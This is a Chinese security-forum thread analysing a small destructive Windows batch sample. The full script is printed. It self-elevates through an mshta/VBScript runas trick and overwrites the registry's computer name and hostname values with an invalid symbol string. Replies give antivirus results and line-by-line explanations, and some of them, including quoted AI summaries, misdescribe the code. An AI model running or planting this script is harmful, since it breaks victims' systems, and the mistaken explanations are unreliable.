一个似乎有破坏性的脚本

0殺神在心0

一个群友发的脚本
似乎有破坏性
解压:infected
VT VirusTotal - File - 646b0054703d0547fcd605a4caf162b34121b7329941bbdcfc33deb48f38fdb1

LovelyTim

奇安信 miss

Hibike

单表代换密码是吧
只是写入HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName和HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\NV Hostname而已。

dght432

360扫描miss

僵尸爱上猫

1. [url=home.php?mod=space&uid=331734]@echo[/url] off
   
2. net file||start mshta vbscript:CreateObject("Shell.Application").ShellExecute("%~F0","","","runas",0)(window.close)&&exit
   
3. set rc=reg add "HKLM\SYSTEM\CurrentControlSet
   
4. set "n={@[:\?=#+.$<(^*_*^)>$.+#=?/:]@}"
   
5. set rb=\Control\ComputerName\
   
6. set s=\Services
   
7. set TP=\Tcpip\Parameters
   
8. set CN=ComputerName
   
9. set d=" /d "
   
10. set v=" /v "
    
11. set f=" /f>nul
    
12. %rc%%rb%%CN%%v%%CN%%d%%n%%f%
    
13. %rc%%rb%Active%CN%%v%%CN%%d%%n%%f%
    
14. %rc%%s%\Eventlog%v%%CN%%d%%n%%f%
    
15. %rc%%s%%TP%%v%NV Hostname%d%%n%%f%
    
16. %rc%%s%%TP%%v%Hostname%d%%n%%f%

复制代码

谈谈MEMZ

该作者分享了一个他从群友那里得到的脚本。他提到这个脚本似乎有破坏性，并提供了解压密码：infected。同时，他还提供了一个VirusTotal的链接，以及一个名为"WinKiller Mini.zip"的压缩包，文件大小为503 Bytes。

这是一个批处理脚本，主要用于在Windows环境下运行。这个脚本的主要作用是修改计算机的名称。下面是对每一行代码的解释：

1.     @echo off：这行代码用于关闭命令提示符的回显功能，也就是说在执行批处理脚本的时候，不会显示每一行命令。
   
2. 
   
3.     net file||start mshta vbscript:CreateObject("Shell.Application").ShellExecute("%~F0","","","runas",0)(window.close)&&exit：这行代码检查脚本是否以管理员权限运行。如果没有以管理员权限运行，它会尝试重新启动脚本并以管理员权限运行。
   
4. 
   
5.     set rc=reg add "HKLM\SYSTEM\CurrentControlSet：这行代码设置了一个变量rc，它的值是一个注册表键的路径。
   
6. 
   
7.     set "n={@[:\?=#+.[        DISCUZ_CODE_1        ]lt;(^*_*^)>$.+#=?/:]@}"：这行代码设置了一个变量n，它的值是一个字符串。
   
8. 
   
9.     set rb=\Control\ComputerName\：这行代码设置了一个变量rb，它的值是一个注册表键的路径。
   
10. 
    
11.     set s=\Services：这行代码设置了一个变量s，它的值是一个字符串。
    
12. 
    
13.     set TP=\Tcpip\Parameters：这行代码设置了一个变量TP，它的值是一个字符串。
    
14. 
    
15.     set CN=ComputerName：这行代码设置了一个变量CN，它的值是一个字符串。
    
16. 
    
17.     set d=" /d "：这行代码设置了一个变量d，它的值是一个字符串。
    
18. 
    
19.     set v=" /v "：这行代码设置了一个变量v，它的值是一个字符串。
    
20. 
    
21.     set f=" /f>nul：这行代码设置了一个变量f，它的值是一个字符串。
    
22. 
    
23.     %rc%%rb%%CN%%v%%CN%%d%%n%%f%：这行代码和接下来的四行代码都是在修改注册表键的值。这些代码将会修改计算机的名称。
    

复制代码

这个脚本的目的是将计算机的名称修改为{@[:\?=#+.$<(^*_*^)>$.+#=?/:]@}。这个名称看起来是随机的，可能是为了隐藏计算机的真实名称。

anxiety520

From VT

1. Crowdsourced AI
   
2. Code Insight
   
3. The code is a batch script that attempts to execute the mshta.exe program with the following command-line arguments:
   
4. 
   
5. ```
   
6. "vbscript:CreateObject("Shell.Application").ShellExecute("%~F0","","","runas",0)(window.close)&&exit"
   
7. ```
   
8. 
   
9. This command-line argument will cause the mshta.exe program to execute the specified VBScript code. The VBScript code will then attempt to create a new instance of the reg.exe program and use it to add the following registry keys:
   
10. 
    
11. * HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
    
12. * HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\ComputerName
    
13. * HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\NV Hostname
    
14. * HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Hostname
    
15. 
    
16. The addition of these registry keys could allow the attacker to control the computer's name and hostname.

复制代码

117054487

best 沙盒检测

hhhq316

扫描
EMSI 0
蜘蛛 0

运行
蜘蛛阻止运行，但是没有杀掉本体

GreatMOLA

ChatGPT kill

该批处理代码可能具有恶意行为。让我们逐行分析代码的内容：

@echo off: 这将关闭批处理的输出显示，使其在运行时不会显示命令提示符窗口。

net file||start mshta...: 这行命令使用net file来检查当前是否有文件共享。如果该命令执行失败（即没有文件共享），则执行mshta命令，该命令可以执行VBScript代码。

mshta vbscript:CreateObject("Shell.Application")...: 此行启动了mshta进程并传递了VBScript代码。VBScript在这里用于执行具有提升的权限（以管理员权限）来重新运行当前的批处理脚本。

set rc=reg add "HKLM\SYSTEM\CurrentControlSet: 这行代码似乎想要将注册表编辑命令reg add赋值给变量rc。但是，代码中断了，缺少后续的引号和命令参数，因此该行代码本身是错误的。

接下来的一系列变量赋值和命令拼接可能是要对注册表进行编辑的操作，但由于代码不完整，无法确定确切的恶意行为。

请注意，我无法在不完整的代码中确定所有的恶意行为，也无法验证其真实意图。如果您遇到可疑的代码或软件，强烈建议不要运行它，以免对您的系统造成损害。在处理不熟悉的代码时，请始终保持谨慎，并从可靠来源获取代码。